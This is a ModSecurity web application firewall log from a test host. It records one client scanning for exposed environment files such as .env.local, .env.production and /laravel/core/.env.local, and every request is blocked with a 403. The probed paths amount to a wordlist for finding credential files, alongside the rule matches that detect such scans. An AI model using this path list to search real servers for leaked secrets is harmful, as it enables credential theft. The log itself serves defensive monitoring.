[Sat Mar 21 04:10:21.566228 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/apis/.env.production"] [unique_id "ab4MHRsiL8ED2XitCKA8VgAAAAI"]
[Sat Mar 21 04:10:21.861721 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/staging/.env.local"] [unique_id "ab4MHRsiL8ED2XitCKA8VwAAAAI"]
[Sat Mar 21 04:10:21.861888 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/staging/.env.local"] [unique_id "ab4MHRsiL8ED2XitCKA8VwAAAAI"]
[Sat Mar 21 04:10:21.862045 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/staging/.env.local"] [unique_id "ab4MHRsiL8ED2XitCKA8VwAAAAI"]
[Sat Mar 21 04:10:22.237074 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env.local"] [unique_id "ab4MHhsiL8ED2XitCKA8WAAAAAI"]
[Sat Mar 21 04:10:22.237230 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env.local"] [unique_id "ab4MHhsiL8ED2XitCKA8WAAAAAI"]
[Sat Mar 21 04:10:22.237380 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env.local"] [unique_id "ab4MHhsiL8ED2XitCKA8WAAAAAI"]
[Sat Mar 21 04:10:22.780257 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env.local"] [unique_id "ab4MHhsiL8ED2XitCKA8WQAAAAI"]
[Sat Mar 21 04:10:22.780411 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env.local"] [unique_id "ab4MHhsiL8ED2XitCKA8WQAAAAI"]
[Sat Mar 21 04:10:22.780568 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env.local"] [unique_id "ab4MHhsiL8ED2XitCKA8WQAAAAI"]
[Sat Mar 21 04:10:23.095642 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /user/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/user/.env.staging"] [unique_id "ab4MHxsiL8ED2XitCKA8WgAAAAI"]
[Sat Mar 21 04:10:23.095844 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/user/.env.staging"] [unique_id "ab4MHxsiL8ED2XitCKA8WgAAAAI"]
[Sat Mar 21 04:10:23.096002 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/user/.env.staging"] [unique_id "ab4MHxsiL8ED2XitCKA8WgAAAAI"]
[Sat Mar 21 04:10:23.390210 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "ab4MHxsiL8ED2XitCKA8WwAAAAI"]
[Sat Mar 21 04:10:23.390407 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "ab4MHxsiL8ED2XitCKA8WwAAAAI"]
[Sat Mar 21 04:10:23.390556 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "ab4MHxsiL8ED2XitCKA8WwAAAAI"]
[Sat Mar 21 04:10:23.685546 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "ab4MHxsiL8ED2XitCKA8XAAAAAI"]
[Sat Mar 21 04:10:23.685774 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "ab4MHxsiL8ED2XitCKA8XAAAAAI"]
[Sat Mar 21 04:10:23.685985 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "ab4MHxsiL8ED2XitCKA8XAAAAAI"]
[Sat Mar 21 04:10:23.982020 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /project/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/project/.env.staging"] [unique_id "ab4MHxsiL8ED2XitCKA8XQAAAAI"]
[Sat Mar 21 04:10:23.982192 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/project/.env.staging"] [unique_id "ab4MHxsiL8ED2XitCKA8XQAAAAI"]
[Sat Mar 21 04:10:23.982372 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/project/.env.staging"] [unique_id "ab4MHxsiL8ED2XitCKA8XQAAAAI"]
[Sat Mar 21 04:10:24.278595 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /xampp/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env.local"] [unique_id "ab4MIBsiL8ED2XitCKA8XgAAAAI"]
[Sat Mar 21 04:10:24.278834 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env.local"] [unique_id "ab4MIBsiL8ED2XitCKA8XgAAAAI"]
[Sat Mar 21 04:10:24.279042 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env.local"] [unique_id "ab4MIBsiL8ED2XitCKA8XgAAAAI"]
[Sat Mar 21 04:10:24.587180 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /product/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/product/.env"] [unique_id "ab4MIBsiL8ED2XitCKA8XwAAAAI"]
[Sat Mar 21 04:10:24.587347 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/product/.env"] [unique_id "ab4MIBsiL8ED2XitCKA8XwAAAAI"]
[Sat Mar 21 04:10:24.587499 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/product/.env"] [unique_id "ab4MIBsiL8ED2XitCKA8XwAAAAI"]
[Sat Mar 21 04:10:24.884343 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /frontend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/FRONTEND/.env"] [unique_id "ab4MIBsiL8ED2XitCKA8YAAAAAI"]
[Sat Mar 21 04:10:24.884569 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/FRONTEND/.env"] [unique_id "ab4MIBsiL8ED2XitCKA8YAAAAAI"]
[Sat Mar 21 04:10:24.884722 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/FRONTEND/.env"] [unique_id "ab4MIBsiL8ED2XitCKA8YAAAAAI"]
[Sat Mar 21 04:10:25.497882 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env.production"] [unique_id "ab4MIRsiL8ED2XitCKA8YgAAAAI"]
[Sat Mar 21 04:10:25.498054 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env.production"] [unique_id "ab4MIRsiL8ED2XitCKA8YgAAAAI"]
[Sat Mar 21 04:10:25.498202 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env.production"] [unique_id "ab4MIRsiL8ED2XitCKA8YgAAAAI"]
[Sat Mar 21 04:10:25.794148 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "ab4MIRsiL8ED2XitCKA8YwAAAAI"]
[Sat Mar 21 04:10:25.794305 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "ab4MIRsiL8ED2XitCKA8YwAAAAI"]
[Sat Mar 21 04:10:25.794468 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "ab4MIRsiL8ED2XitCKA8YwAAAAI"]
[Sat Mar 21 04:10:26.112133 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /develop/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/develop/.env.staging"] [unique_id "ab4MIhsiL8ED2XitCKA8ZAAAAAI"]
[Sat Mar 21 04:10:26.112309 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/develop/.env.staging"] [unique_id "ab4MIhsiL8ED2XitCKA8ZAAAAAI"]
[Sat Mar 21 04:10:26.112466 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/develop/.env.staging"] [unique_id "ab4MIhsiL8ED2XitCKA8ZAAAAAI"]
